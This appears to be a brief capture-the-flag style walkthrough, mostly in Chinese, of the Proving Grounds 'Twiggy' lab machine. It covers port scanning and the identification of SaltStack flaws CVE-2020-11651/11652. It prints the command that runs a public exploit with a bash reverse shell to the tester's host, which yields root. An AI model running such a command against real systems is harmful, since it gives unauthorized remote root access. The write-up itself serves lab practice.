Proving Grounds Practice : Twiggy Walkthrough
Proving Grounds Practice : Twiggy Walkthrough
Foothold :
- 8000 Port 發現 salt-api,查看 Exploit 相關利用是 CVE-2020-11651 & CVE-2020-11652
- 查看 python code 都是利用 4506 Port 與靶機相符
- 直接利用 exploit 拿到 Reverse shell
PE :
- 不用 PE,Reverse Shell 進來就是 Root
Rustscan,└─$ rustscan -a 192.168.223.62 --scripts none --ulimit 5000 | tee rustscan
snmp check,└─$ sudo nmap -sU -p 161 192.168.223.62 | tee snmp
nmap,└─$ sudo nmap -sCV -A -p 22,53,80,4505,4506,8000 192.168.223.62 | tee nmap
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
53/tcp open domain NLnet Labs NSD
80/tcp open http nginx 1.16.1
4505/tcp open zmtp ZeroMQ ZMTP 2.0
4506/tcp open zmtp ZeroMQ ZMTP 2.0
8000/tcp open http nginx 1.16.1
whatweb
80 /
searchsploit Mezzanine
是個 CSS 的利用,先跳過
gobuster 80 /,發現 sitemap.xml
80 /sitemap.xml ,都指向 8000 Port
繼續往下 searchsploit 4505、4506 發現的 ZeroMQ ZMTP 2.0,沒有發現
Google Exploit 看看發現應該有戲
先繼續往下看 8000 /
直接用剛剛的 Google 第一個連結抓取
指令 └─$ python3 exploit.py --master 192.168.223.62 --exec "bash -i >& /dev/tcp/192.168.45.168/80 0>&1"
80 Reverse Shell 進來了,直接就是 Root
留言
張貼留言